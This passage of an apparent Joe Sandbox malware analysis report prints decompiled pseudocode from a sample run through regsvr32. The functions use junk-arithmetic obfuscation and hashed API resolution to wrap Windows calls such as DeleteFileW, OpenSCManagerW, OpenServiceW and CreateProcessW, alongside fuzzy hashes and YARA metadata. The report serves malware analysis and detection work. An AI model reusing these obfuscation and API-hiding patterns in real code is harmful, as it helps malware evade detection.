				_v16 = _v16 ^ 0x000d135a;
				_v12 = 0x90c5d0;
				_v12 = _v12 ^ 0x2cafc93f;
				_v12 = _v12 ^ 0x2c381e09;
				E0025BFF0(0xac802c42, 0x347, _t50, _t50, 0xede26741);
				_t47 = LoadLibraryW(_t57); // executed
				return _t47;
			}

0x0024fcbc
0x0024fcbf
0x0024fcc1
0x0024fcc3
0x0024fcc8
0x0024fcd6
0x0024fcdb
0x0024fce0
0x0024fce7
0x0024fcee
0x0024fcf5
0x0024fcfc
0x0024fd03
0x0024fd0d
0x0024fd13
0x0024fd16
0x0024fd1d
0x0024fd24
0x0024fd2b
0x0024fd4f
0x0024fd58
0x0024fd5e

APIs

LoadLibraryW.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 0024FD58

Memory Dump Source

Source File: 0000000A.00000002.741783060.0000000000241000.00000020.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: true

Associated: 0000000A.00000002.741737246.0000000000240000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.742071080.0000000000264000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_240000_regsvr32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 8bacd117322b64fd42504966482242d0bc11aa74408019ed1aecf2da1c0dea5e
Instruction ID: 6bb24a93b3f891bfe7ddff2b6c00f4bb404fe60112c9c062bbcc3aa27f375328
Opcode Fuzzy Hash: 8bacd117322b64fd42504966482242d0bc11aa74408019ed1aecf2da1c0dea5e
Instruction Fuzzy Hash: 84112E71E00218EBDB18DFA5C84A8EFBBB5EB44304F108189E429A6251DBB56B148F91

Uniqueness

Uniqueness Score: -1.00%

Function 00249EA8 Relevance: 1.5, APIs: 1, Instructions: 44
fileCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00249EA8(WCHAR* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t35;
				int _t42;
				WCHAR* _t46;

				_push(_a8);
				_t46 = __ecx;
				_push(_a4);
				_push(__ecx);
				E00249E7D(_t35);
				_v20 = 0xb0cce;
				_v20 = _v20 + 0xffff00ee;
				_v20 = _v20 ^ 0x0007bd05;
				_v12 = 0x1e8fca;
				_v12 = _v12 >> 6;
				_v12 = _v12 << 8;
				_v12 = _v12 + 0xffff1da9;
				_v12 = _v12 ^ 0x0077171f;
				_v16 = 0xc679b7;
				_v16 = _v16 + 0x38bf;
				_v16 = _v16 ^ 0x00cf762a;
				_v8 = 0xa3ba51;
				_v8 = _v8 ^ 0xa0d3ead1;
				_v8 = _v8 + 0xe688;
				_v8 = _v8 + 0xffff6d73;
				_v8 = _v8 ^ 0xa079263d;
				E0025BFF0(0xac802c42, 0x385, __ecx, __ecx, 0x77e9f533);
				_t42 = DeleteFileW(_t46); // executed
				return _t42;
			}

0x00249eaf
0x00249eb2
0x00249eb4
0x00249eb8
0x00249eb9
0x00249ebe
0x00249ec8
0x00249ecf
0x00249ed6
0x00249edd
0x00249ee1
0x00249ee5
0x00249eec
0x00249ef3
0x00249efa
0x00249f01
0x00249f08
0x00249f0f
0x00249f16
0x00249f1d
0x00249f24
0x00249f48
0x00249f51
0x00249f57

APIs

DeleteFileW.KERNEL32(?,?,?,?,?,?,?,00E39F9E,00000000), ref: 00249F51

Memory Dump Source

Source File: 0000000A.00000002.741783060.0000000000241000.00000020.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: true

Associated: 0000000A.00000002.741737246.0000000000240000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.742071080.0000000000264000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_240000_regsvr32.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 05b63ea037540c08496bef69ee0cecfed80cfa419fc6bd7bfec422803f2d9975
Instruction ID: 42ae824c8b2f8ef13b62a938107ff5b5aa0fa3db7deab8d6f902bd89466311b2
Opcode Fuzzy Hash: 05b63ea037540c08496bef69ee0cecfed80cfa419fc6bd7bfec422803f2d9975
Instruction Fuzzy Hash: 381148B1C11619EBDF48DFA4D80A8DEBBB4EF10318F108288E825A6250E7B05B588F91

Uniqueness

Uniqueness Score: -1.00%

Function 0024BA9C Relevance: 1.5, APIs: 1, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E0024BA9C(int _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				void* _t34;

				_v20 = 0x6b4597;
				_v20 = _v20 >> 2;
				_v20 = _v20 ^ 0x00116e69;
				_v16 = 0x7d3df7;
				_v16 = _v16 << 3;
				_v16 = _v16 ^ 0x03ee9fa4;
				_v12 = 0x7e0c35;
				_v12 = _v12 ^ 0xa2581e84;
				_v12 = _v12 ^ 0xa22bc007;
				_v8 = 0xada9ee;
				_push(_t34);
				_v8 = _v8 * 0x61;
				_v8 = _v8 << 0xb;
				_v8 = _v8 ^ 0x6b103fde;
				E0025BFF0(0xac802c42, 0x166, _t34, _t34, 0x80a33dd2);
				ExitProcess(_a12);
			}

0x0024baa2
0x0024baa9
0x0024baad
0x0024bab4
0x0024babb
0x0024babf
0x0024bac6
0x0024bacd
0x0024bad4
0x0024badb
0x0024bae6
0x0024baee
0x0024baf6
0x0024bafa
0x0024bb12
0x0024bb1d

APIs

ExitProcess.KERNEL32(00116E69), ref: 0024BB1D

Memory Dump Source

Source File: 0000000A.00000002.741783060.0000000000241000.00000020.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: true

Associated: 0000000A.00000002.741737246.0000000000240000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.742071080.0000000000264000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_240000_regsvr32.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 5a29f8c2dfa274dc4c38ec6c4fc52361ad96745e54715afb883c837706f91096
Instruction ID: b9d22943f829bd0ad7fdf1db6be30b710013428506e524ba21e1a3ec45fefde0
Opcode Fuzzy Hash: 5a29f8c2dfa274dc4c38ec6c4fc52361ad96745e54715afb883c837706f91096
Instruction Fuzzy Hash: D20100B5D1120CEB8B08DFA8CA4A9DEBBB4FB04348F108699E821B7211D7B55B14CF81

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: regsvr32.exePID: 1684, Parent PID: 2812COMMON

Executed Functions

Function 004AF1D5 Relevance: 1.6, APIs: 1, Instructions: 69
COMMONCrypto

Download Yara Rule

C-Code - Quality: 58%

			E004AF1D5(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				unsigned int _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t49;
				intOrPtr* _t58;
				void* _t59;
				signed int _t62;
				void* _t67;
				void* _t68;

				_t68 = __edx;
				_t67 = __ecx;
				E004A9E7D(_t49);
				_v36 = 0xea873e;
				_v32 = 0xb2392b;
				_v28 = 0;
				_v24 = 0;
				_v12 = 0xdc192d;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 >> 0xf;
				_v12 = _v12 + 0x11b5;
				_v12 = _v12 ^ 0x0007f5c7;
				_v20 = 0x6dcef4;
				_t62 = 0x6b;
				_v20 = _v20 * 0x54;
				_v20 = _v20 << 0x10;
				_v20 = _v20 ^ 0xe81a0a50;
				_v16 = 0x9ccfab;
				_v16 = _v16 | 0xc76ed5d6;
				_v16 = _v16 >> 0xf;
				_v16 = _v16 ^ 0x000c5bda;
				_v8 = 0xcca784;
				_v8 = _v8 / _t62;
				_v8 = _v8 >> 0xf;
				_v8 = _v8 ^ 0x01549e3f;
				_v8 = _v8 ^ 0x01571d5c;
				_t58 = E004BBFF0(0xac802c42, 0x317, _t62, _t62, 0x42a4b2ae);
				_t59 =  *_t58(_t67, 0, _t68, 0x28, __ecx, __edx, _a4, _a8, 0, _a16, _a20, 0x28); // executed
				return _t59;
			}

0x004af1e5
0x004af1ea
0x004af1f5
0x004af1fa
0x004af203
0x004af20a
0x004af20d
0x004af210
0x004af217
0x004af21b
0x004af21f
0x004af226
0x004af22d
0x004af23a
0x004af23e
0x004af241
0x004af245
0x004af24c
0x004af253
0x004af25a
0x004af25e
0x004af265
0x004af276
0x004af279
0x004af27d
0x004af284
0x004af2a3
0x004af2b0
0x004af2b8

APIs

SetFileInformationByHandle.KERNEL32(00000000,00000000,?,00000028,?,?,?,?,?,?,?,?,00000028,00000000,0000002C,00000000), ref: 004AF2B0

Memory Dump Source

Source File: 0000000B.00000002.749867154.00000000004A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 004A0000, based on PE: true

Associated: 0000000B.00000002.749858667.00000000004A0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.749972223.00000000004C4000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4a0000_regsvr32.jbxd

Yara matches

Similarity

API ID: FileHandleInformation
String ID:
API String ID: 3935143524-0
Opcode ID: 77f1dd4d0ad90e3cc37e42a6920fbdcf951fc3ee27da9feae082ec12eeed1182
Instruction ID: 6e8fc4366007314ac52af7863127e9bfc7585e4bb455fe71c96859e66f417397
Opcode Fuzzy Hash: 77f1dd4d0ad90e3cc37e42a6920fbdcf951fc3ee27da9feae082ec12eeed1182
Instruction Fuzzy Hash: E52155B5D0121DAFDB08DFA6C88A8EEFBB4FB44708F10809DE515AA240C7B45B54DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 004A32B5 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			E004A32B5(void* __ecx, void* __edx, int _a4, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				short* _v24;
				short* _v28;
				intOrPtr _v32;
				void* _t49;
				void* _t62;
				signed int _t64;
				signed int _t65;

				_push(0);
				_push(_a12);
				_push(0);
				_push(_a4);
				E004A9E7D(_t49);
				_v32 = 0xf329ca;
				_v28 = 0;
				_v24 = 0;
				_v16 = 0x2373b;
				_t64 = 0x7a;
				_v16 = _v16 * 0x75;
				_t65 = 0x3d;
				_v16 = _v16 / _t64;
				_v16 = _v16 ^ 0x00061266;
				_v12 = 0xb7be71;
				_v12 = _v12 >> 0xb;
				_v12 = _v12 + 0xafdb;
				_v12 = _v12 ^ 0x7920a4e8;
				_v12 = _v12 ^ 0x79205c77;
				_v8 = 0x1abc5;
				_v8 = _v8 / _t65;
				_v8 = _v8 << 0xb;
				_v8 = _v8 ^ 0x07f89b39;
				_v8 = _v8 ^ 0x07caeaee;
				_v20 = 0x49b926;
				_v20 = _v20 * 0x47;
				_v20 = _v20 ^ 0x147483b3;
				E004BBFF0(0x11de522c, 0x30d, _t65, _t65, 0xea9607);
				_t62 = OpenSCManagerW(0, 0, _a4); // executed
				return _t62;
			}

0x004a32be
0x004a32bf
0x004a32c2
0x004a32c3
0x004a32c8
0x004a32cd
0x004a32d6
0x004a32d9
0x004a32dc
0x004a32e9
0x004a32ec
0x004a32f4
0x004a32f5
0x004a32fa
0x004a3304
0x004a330b
0x004a330f
0x004a3316
0x004a331d
0x004a3324
0x004a3335
0x004a3338
0x004a333c
0x004a3343
0x004a334a
0x004a3361
0x004a3364
0x004a3377
0x004a3384
0x004a338a

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,79205C77,?,?,?,?,?,?,?,?,00000000), ref: 004A3384

Strings

w\ y, xrefs: 004A331D

Memory Dump Source

Source File: 0000000B.00000002.749867154.00000000004A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 004A0000, based on PE: true

Associated: 0000000B.00000002.749858667.00000000004A0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.749972223.00000000004C4000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4a0000_regsvr32.jbxd

Yara matches

Similarity

API ID: ManagerOpen
String ID: w\ y
API String ID: 1889721586-240614871
Opcode ID: 1f5861dd61b294354832cf9b9edfb87b87b26e314b348a251be8c10d0985441e
Instruction ID: 35aedaa867e92eb7f4635beb5b83cd26141029c97fd610cef935726bc9387ffe
Opcode Fuzzy Hash: 1f5861dd61b294354832cf9b9edfb87b87b26e314b348a251be8c10d0985441e
Instruction Fuzzy Hash: 552123B5D01228FFCB04DFAAD84A9EEBFB5FB40304F20818AE424A6251D3B55B40DF90

Uniqueness

Uniqueness Score: -1.00%

Function 004AC4EB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 54
serviceCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 76%

			E004AC4EB(void* __ecx, int __edx, short* _a4, void* _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t46;
				void* _t54;
				int _t58;

				_push(_a16);
				_t58 = __edx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E004A9E7D(_t46);
				_v24 = _v24 & 0x00000000;
				_v36 = 0xd40f1;
				_v32 = 0xcb52a0;
				_v28 = 0x146fa1;
				_v20 = 0xb8dab7;
				_v20 = _v20 >> 1;
				_v20 = _v20 << 5;
				_v20 = _v20 ^ 0x0b80f677;
				_v8 = 0x87dd92;
				_v8 = _v8 + 0xffffe9d3;
				_v8 = _v8 * 0x55;
				_v8 = _v8 << 0xa;
				_v8 = _v8 ^ 0x54d92ec5;
				_v16 = 0xb88fea;
				_v16 = _v16 | 0xf85cd4fd;
				_v16 = _v16 + 0xed22;
				_v16 = _v16 ^ 0xf8f0d6dc;
				_v12 = 0x2c3d87;
				_v12 = _v12 + 0x3690;
				_v12 = _v12 + 0xfffff048;
				_v12 = _v12 ^ 0x0029d00c;
				E004BBFF0(0x11de522c, 0xe1, __ecx, __ecx, 0x5fb2da2f);
				_t54 = OpenServiceW(_a8, _a4, _t58); // executed
				return _t54;
			}

0x004ac4f2
0x004ac4f5
0x004ac4f7
0x004ac4fa
0x004ac4fd
0x004ac500
0x004ac501
0x004ac502
0x004ac507
0x004ac50e
0x004ac515
0x004ac51c
0x004ac523
0x004ac52a
0x004ac52d
0x004ac531
0x004ac538
0x004ac53f
0x004ac556
0x004ac55e
0x004ac562
0x004ac569
0x004ac570
0x004ac577
0x004ac57e
0x004ac585
0x004ac58c
0x004ac593
0x004ac59a
0x004ac5ad
0x004ac5bc
0x004ac5c2

APIs

OpenServiceW.ADVAPI32(F8F0D6DC,0029D00C,?,?,?,?,?,?,?,?,?,?), ref: 004AC5BC

Strings

", xrefs: 004AC577

Memory Dump Source

Source File: 0000000B.00000002.749867154.00000000004A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 004A0000, based on PE: true

Associated: 0000000B.00000002.749858667.00000000004A0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.749972223.00000000004C4000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4a0000_regsvr32.jbxd

Yara matches

Similarity

API ID: OpenService
String ID: "
API String ID: 3098006287-1598837362
Opcode ID: a522d33089ec895b54db4c824c20dd1e836209a16b7f06b25475ede4dc9ef992
Instruction ID: c872bd7dbea76d68f7c5e9533bf6f847f5eb0e31311a9a20d415bc543a52b8cb
Opcode Fuzzy Hash: a522d33089ec895b54db4c824c20dd1e836209a16b7f06b25475ede4dc9ef992
Instruction Fuzzy Hash: A0211FB5C01209ABCF15DFA5D8499EEBBB4EF14318F108588E925A6260E3B55B14DF90

Uniqueness

Uniqueness Score: -1.00%

Function 004BA98E Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 54
serviceCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 90%

			E004BA98E(void* __ecx, void* __edx, void* _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* _t45;
				int _t58;
				signed int _t60;
				signed int _t61;

				_push(_a8);
				_push(_a4);
				E004A9E7D(_t45);
				_v24 = _v24 & 0x00000000;
				_v28 = 0xdfb18c;
				_v12 = 0xac05d3;
				_v12 = _v12 + 0xffffe692;
				_t60 = 6;
				_v12 = _v12 * 0xa;
				_v12 = _v12 ^ 0x06b0bc77;
				_v20 = 0xcbcea5;
				_t61 = 0x73;
				_v20 = _v20 / _t60;
				_v20 = _v20 ^ 0x0026c0c8;
				_v16 = 0x706a69;
				_v16 = _v16 + 0xffff322e;
				_v16 = _v16 ^ 0x006745ff;
				_v8 = 0xc7f3e7;
				_v8 = _v8 * 0x7b;
				_v8 = _v8 + 0xffffee1e;
				_v8 = _v8 / _t61;
				_v8 = _v8 ^ 0x00d4d133;
				E004BBFF0(0x11de522c, 0x223, _t61, _t61, 0x2fdf0f26);
				_t58 = CloseServiceHandle(_a4); // executed
				return _t58;
			}

0x004ba994
0x004ba997
0x004ba99c
0x004ba9a1
0x004ba9a7
0x004ba9ae
0x004ba9b5
0x004ba9c2
0x004ba9c5
0x004ba9c8
0x004ba9cf
0x004ba9db
0x004ba9dc
0x004ba9e1
0x004ba9eb
0x004ba9f2
0x004ba9f9
0x004baa00
0x004baa17
0x004baa1a
0x004baa2b
0x004baa2e
0x004baa41
0x004baa4c
0x004baa51

APIs

CloseServiceHandle.ADVAPI32(06B0BC77,?,?,?,?,?,?,?,?), ref: 004BAA4C

Strings

ijp, xrefs: 004BA9EB

Memory Dump Source

Source File: 0000000B.00000002.749867154.00000000004A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 004A0000, based on PE: true

Associated: 0000000B.00000002.749858667.00000000004A0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.749972223.00000000004C4000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4a0000_regsvr32.jbxd

Yara matches

Similarity

API ID: CloseHandleService
String ID: ijp
API String ID: 1725840886-2001787820
Opcode ID: 1ca84afc33d7b938950ae22bf4e2629023950455804043fd17485c6cfe7ce1c4
Instruction ID: 4dba108a77554b7405d1b3f43770b5808f8fbc19efd3fbe3aa528775a0e7b645
Opcode Fuzzy Hash: 1ca84afc33d7b938950ae22bf4e2629023950455804043fd17485c6cfe7ce1c4
Instruction Fuzzy Hash: D82117B5D0520DFBEF04DFA5D98A9AEBBB1EB40304F10C19AE404AB250D7B49B449F84

Uniqueness

Uniqueness Score: -1.00%

Function 004A338B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 52
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E004A338B(void* __ecx, void* __edx, struct _SHFILEOPSTRUCTW* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				void* _t46;
				int _t58;
				signed int _t60;

				_push(_a4);
				E004A9E7D(_t46);
				_v28 = _v28 & 0x00000000;
				_v24 = _v24 & 0x00000000;
				_v32 = 0x221b15;
				_v20 = 0x156690;
				_t60 = 5;
				_v20 = _v20 * 0x69;
				_v20 = _v20 ^ 0x08c90ac4;
				_v12 = 0x1a8107;
				_v12 = _v12 / _t60;
				_v12 = _v12 | 0x5e0d12b3;
				_v12 = _v12 * 0x36;
				_v12 = _v12 ^ 0xd6d73012;
				_v8 = 0x305b7c;
				_v8 = _v8 + 0xffffaa6a;
				_v8 = _v8 << 0xf;
				_v8 = _v8 | 0xeac0b19d;
				_v8 = _v8 ^ 0xeaf3a664;
				_v16 = 0x5b8d10;
				_v16 = _v16 * 0x69;
				_v16 = _v16 + 0x95d4;
				_v16 = _v16 ^ 0x258da45e;
				E004BBFF0(0xee7aaf55, 0x302, _t60, _t60, 0x2f7a8b42);
				_t58 = SHFileOperationW(_a4); // executed
				return _t58;
			}

0x004a3391
0x004a3396
0x004a339b
0x004a33a1
0x004a33a5
0x004a33ac
0x004a33b9
0x004a33bd
0x004a33c0
0x004a33c7
0x004a33d8
0x004a33db
0x004a33f2
0x004a33f5
0x004a33fc
0x004a3403
0x004a340a
0x004a340e
0x004a3415
0x004a341c
0x004a3427
0x004a342a
0x004a3431
0x004a3444
0x004a344f
0x004a3454

APIs

SHFileOperationW.SHELL32(D6D73012,?,?,?,?,?,?,?), ref: 004A344F

Strings

|[0, xrefs: 004A33FC

Memory Dump Source

Source File: 0000000B.00000002.749867154.00000000004A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 004A0000, based on PE: true

Associated: 0000000B.00000002.749858667.00000000004A0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.749972223.00000000004C4000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4a0000_regsvr32.jbxd

Yara matches

Similarity

API ID: FileOperation
String ID: |[0
API String ID: 3080627654-3711761429
Opcode ID: 192e83401a02290710fada622201ed24515585c6a043cd12288e9317895715c1
Instruction ID: c58914c4bca81224e70074ba724e7f9aced57ccd0a4aa8e0aa14acc5b651ef48
Opcode Fuzzy Hash: 192e83401a02290710fada622201ed24515585c6a043cd12288e9317895715c1
Instruction Fuzzy Hash: FE2106B4D01209EFDF04DFA5C94AAEEBBB4FB10315F10858DE424AA291D7B96B548F90

Uniqueness

Uniqueness Score: -1.00%

Function 004BE373 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E004BE373(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t41;
				int _t51;
				signed int _t53;
				void* _t58;

				_push(_a8);
				_t58 = __edx;
				_push(_a4);
				_push(__edx);
				E004A9E7D(_t41);
				_v20 = 0xc362e1;
				_v20 = _v20 + 0xffff2419;
				_v20 = _v20 + 0xffff15b9;
				_v20 = _v20 ^ 0x00c90db5;
				_v16 = 0x370fa8;
				_v16 = _v16 + 0x3ddc;
				_v16 = _v16 + 0xfffffca4;
				_v16 = _v16 ^ 0x003af0ce;
				_v8 = 0x58cda3;
				_t53 = 0x37;
				_v8 = _v8 / _t53;
				_v8 = _v8 | 0xee3498e5;
				_v8 = _v8 + 0xffff3fab;
				_v8 = _v8 ^ 0xee3595ac;
				_v12 = 0xe7384d;
				_v12 = _v12 + 0x2a59;
				_v12 = _v12 * 0x31;
				_v12 = _v12 ^ 0x2c4bf561;
				E004BBFF0(0xac802c42, 0x278, _t53, _t53, 0x298e9f43);
				_t51 = CloseHandle(_t58); // executed
				return _t51;
			}

0x004be37a
0x004be37d
0x004be37f
0x004be382
0x004be384
0x004be389
0x004be392
0x004be399
0x004be3a0
0x004be3a7
0x004be3ae
0x004be3b5
0x004be3bc
0x004be3c3
0x004be3cf
0x004be3d5
0x004be3d8
0x004be3df
0x004be3e6
0x004be3ed
0x004be3f4
0x004be40b
0x004be413
0x004be426
0x004be42f
0x004be435

APIs

CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,004B3F2A,00000000), ref: 004BE42F

Strings

M8, xrefs: 004BE3ED

Memory Dump Source

Source File: 0000000B.00000002.749867154.00000000004A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 004A0000, based on PE: true

Associated: 0000000B.00000002.749858667.00000000004A0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.749972223.00000000004C4000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4a0000_regsvr32.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID: M8
API String ID: 2962429428-669864304
Opcode ID: 68676e9891b26dd68fe09ea734f654e49ab76dccc486115711d770e020b531c2
Instruction ID: 049ac54f1b483f4a1f89e787bc8b5b1c234c8e9d0304dfb9336f8076b0017c92
Opcode Fuzzy Hash: 68676e9891b26dd68fe09ea734f654e49ab76dccc486115711d770e020b531c2
Instruction Fuzzy Hash: 2A1159B5D00209EFDF58DFA4C8498DEBBB4EB40324F108299E824B6291D3B55B058F91

Uniqueness

Uniqueness Score: -1.00%

Function 004B46E0 Relevance: 1.6, APIs: 1, Instructions: 76
processCOMMON

Download Yara Rule

C-Code - Quality: 43%

			E004B46E0(void* __ecx, struct _PROCESS_INFORMATION* __edx, long _a8, intOrPtr _a12, struct _STARTUPINFOW* _a16, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, WCHAR* _a40, intOrPtr _a44, int _a48, intOrPtr _a56, intOrPtr _a60, WCHAR* _a64, intOrPtr _a68) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t55;
				int _t64;
				signed int _t66;
				struct _PROCESS_INFORMATION* _t72;

				_push(_a68);
				_t72 = __edx;
				_push(_a64);
				_push(_a60);
				_push(_a56);
				_push(0);
				_push(_a48);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(0);
				_push(__edx);
				E004A9E7D(_t55);
				_v8 = 0x728488;
				_v8 = _v8 + 0x86b5;
				_v8 = _v8 << 0xb;
				_v8 = _v8 + 0xe7c2;
				_v8 = _v8 ^ 0x98526b3c;
				_v16 = 0xdd86ac;
				_v16 = _v16 | 0x9093749e;
				_v16 = _v16 + 0x773d;
				_v16 = _v16 ^ 0x90e3102d;
				_v20 = 0xa04379;
				_v20 = _v20 + 0xe8c2;
				_v20 = _v20 ^ 0x00a70f96;
				_v12 = 0x20815c;
				_t66 = 0x4c;
				_v12 = _v12 / _t66;
				_v12 = _v12 | 0xbbf973da;
				_v12 = _v12 ^ 0xbbf5b48f;
				E004BBFF0(0xac802c42, 0x58, _t66, _t66, 0xb43c22a7);
				_t64 = CreateProcessW(_a64, _a40, 0, 0, _a48, _a8, 0, 0, _a16, _t72); // executed
				return _t64;
			}

0x004b46e8
0x004b46ed
0x004b46ef
0x004b46f2
0x004b46f5
0x004b46f8
0x004b46f9
0x004b46fc
0x004b46ff
0x004b4702
0x004b4703
0x004b4706
0x004b4709
0x004b470c
0x004b470d
0x004b4710
0x004b4713
0x004b4716
0x004b4717
0x004b4719
0x004b471e
0x004b4727
0x004b472e
0x004b4732
0x004b4739
0x004b4740
0x004b4747
0x004b474e
0x004b4755
0x004b475c
0x004b4763
0x004b476a
0x004b4771
0x004b477d
0x004b4783
0x004b4786
0x004b478d
0x004b47ae
0x004b47ca
0x004b47d1

APIs

CreateProcessW.KERNEL32(?,?,00000000,00000000,?,90E3102D,00000000,00000000,00000000), ref: 004B47CA

Memory Dump Source

Source File: 0000000B.00000002.749867154.00000000004A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 004A0000, based on PE: true

Associated: 0000000B.00000002.749858667.00000000004A0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.749972223.00000000004C4000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4a0000_regsvr32.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: e0c050ce58c662d84963154c999a7e43a34ddb0fe429297838269ca99bc78211
Instruction ID: f26e1f692be1331f00b66f6d5c399f1305e09d029198f8e42b3b8a106c7e3ac7
Opcode Fuzzy Hash: e0c050ce58c662d84963154c999a7e43a34ddb0fe429297838269ca99bc78211
Instruction Fuzzy Hash: A931F472900248FBDF559F96CD09CDEBF75FB89314F008148FA2462160D7B69A60DF60

Uniqueness

Uniqueness Score: -1.00%

Function 004BBF1C Relevance: 1.6, APIs: 1, Instructions: 63
fileCOMMON

Download Yara Rule

C-Code - Quality: 55%

			E004BBF1C(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, WCHAR* _a20, long _a24, long _a36, intOrPtr _a40) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t47;
				void* _t55;
				long _t60;

				_push(_a40);
				_t60 = __edx;
				_push(_a36);
				_push(0);
				_push(0);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E004A9E7D(_t47);
				_v20 = 0x8eb723;
				_v20 = _v20 + 0xdb15;
				_v20 = _v20 ^ 0x00852a30;
				_v16 = 0x113147;
				_v16 = _v16 >> 0xc;
				_v16 = _v16 << 0xa;
				_v16 = _v16 ^ 0x0008263d;
				_v12 = 0x276480;
				_v12 = _v12 + 0x6f6f;
				_v12 = _v12 | 0x7ba60f09;
				_v12 = _v12 * 0x1e;
				_v12 = _v12 ^ 0x7da9aca6;
				_v8 = 0x62f42b;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 << 3;
				_v8 = _v8 >> 3;
				_v8 = _v8 ^ 0x000dc6a5;
				E004BBFF0(0xac802c42, 0xfa, __ecx, __ecx, 0xbf3d9e5c);
